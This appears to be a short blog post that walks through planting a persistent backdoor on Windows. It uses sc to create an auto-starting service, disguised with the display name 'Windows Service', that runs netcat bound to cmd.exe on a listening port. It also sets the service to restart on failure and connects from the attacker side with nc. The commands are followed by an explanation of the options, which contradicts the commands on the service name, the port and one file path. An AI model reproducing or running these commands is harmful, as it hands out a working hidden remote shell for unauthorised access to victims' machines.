C:>sc create backdoor binpath= “cmd /C C:\nc.exe -dLp 6666 -e cmd.exe” type= own type= interact start= auto DisplayName= “Windows Service”
[SC] CreateService SUCCESS

C:>sc start backdoor
C:>sc failure backdoor reset= 86400 actions= restart/1/restart/10/run/30000 command= “cmd /C C:nc.exe -dLp 6666 -e cmd.exe”
[SC] ChangeServiceConfig2 SUCCESS

C:>nc <victim> <port>

* sc is a command used by the services controller tool that is used to manage and control services
* create is the command entered to actually create the service
* systemshell is the new service to be created
* binpath is the path to the binary file
* C:\nc . exe is the service that is actually running under the name systemshell
* the options –dlp mean (d) detach from console which allows netcat to rnn without being displaying in the tasklist, (l) is a type of listen mode that allows netcat to listen as a server, and (p) allows you to specify the port to listen on
* 666  is the specified port
* the -e option is referred to as the execute option because it allows you to bind an executable to a port that will execute with the victim connects to the named listening port
* cmd . exe is the executable to be executed upon connecting to the port
* the type option is set equal to own, share, interact, kernal, and filesys to indicate the type of service to be created

Take care!






Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s